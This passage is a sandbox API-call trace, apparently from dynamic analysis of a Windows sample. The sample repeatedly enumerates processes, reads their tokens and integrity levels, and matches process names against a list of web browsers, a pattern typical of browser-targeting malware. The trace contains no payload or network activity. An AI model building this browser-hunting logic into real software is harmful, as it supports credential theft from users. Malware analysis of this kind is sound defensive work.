1 [0526.842] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0526.842] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0526.842] GetLastError () returned 0x7a [0526.842] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0526.842] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0526.842] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0526.842] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0526.842] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0526.842] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0526.842] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0526.842] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0526.842] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0526.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0526.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0526.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0526.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0526.842] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0526.843] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0526.843] GetLastError () returned 0x7a [0526.843] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0526.843] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0526.843] CloseHandle (hObject=0x29c) returned 1 [0526.843] CloseHandle (hObject=0x298) returned 1 [0526.843] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0526.843] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0526.843] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0526.843] GetLastError () returned 0x7a [0526.843] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0526.843] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0526.843] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0526.843] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0526.843] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0526.843] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0526.843] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0526.843] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0526.843] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0526.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0526.843] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0526.843] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0528.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa018) returned 0xc0000004 [0528.849] VirtualAlloc (lpAddress=0x0, dwSize=0xb018, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0528.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb018, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0528.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0528.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0528.852] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0528.852] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0528.853] GetLastError () returned 0x7a [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0528.853] CloseHandle (hObject=0x29c) returned 1 [0528.853] CloseHandle (hObject=0x298) returned 1 [0528.853] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0528.853] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0528.853] GetLastError () returned 0x7a [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0528.853] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0528.853] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0528.853] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0528.853] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0528.853] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0528.853] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0528.853] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0528.853] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0528.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0528.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0528.853] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0528.853] GetLastError () returned 0x7a [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0528.853] CloseHandle (hObject=0x29c) returned 1 [0528.853] CloseHandle (hObject=0x298) returned 1 [0528.853] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0528.853] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0528.853] GetLastError () returned 0x7a [0528.853] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0528.853] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0528.853] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0528.854] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0528.854] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0528.854] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0528.854] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0528.854] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0528.854] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0528.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0528.854] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0528.854] GetLastError () returned 0x7a [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0528.854] CloseHandle (hObject=0x29c) returned 1 [0528.854] CloseHandle (hObject=0x298) returned 1 [0528.854] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0528.854] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0528.854] GetLastError () returned 0x7a [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0528.854] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0528.854] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0528.854] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0528.854] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0528.854] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0528.854] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0528.854] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0528.854] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0528.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0528.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0528.854] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0528.854] GetLastError () returned 0x7a [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0528.854] CloseHandle (hObject=0x29c) returned 1 [0528.854] CloseHandle (hObject=0x298) returned 1 [0528.854] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0528.854] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0528.854] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0528.855] GetLastError () returned 0x7a [0528.855] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0528.855] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0528.855] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0528.855] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0528.855] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0528.855] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0528.855] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0528.855] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0528.855] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0528.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0528.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0528.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0528.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0528.855] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0528.855] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0528.855] GetLastError () returned 0x7a [0528.855] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0528.855] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0528.855] CloseHandle (hObject=0x29c) returned 1 [0528.855] CloseHandle (hObject=0x298) returned 1 [0528.855] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0528.855] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0528.855] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0528.855] GetLastError () returned 0x7a [0528.855] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0528.855] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0528.855] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0528.855] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0528.855] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0528.855] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0528.855] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0528.855] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0528.855] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0528.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0528.855] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0528.856] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0530.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9fc8) returned 0xc0000004 [0530.860] VirtualAlloc (lpAddress=0x0, dwSize=0xafc8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0530.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xafc8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0530.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0530.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0530.861] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0530.861] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0530.861] GetLastError () returned 0x7a [0530.861] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0530.861] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0530.861] CloseHandle (hObject=0x29c) returned 1 [0530.861] CloseHandle 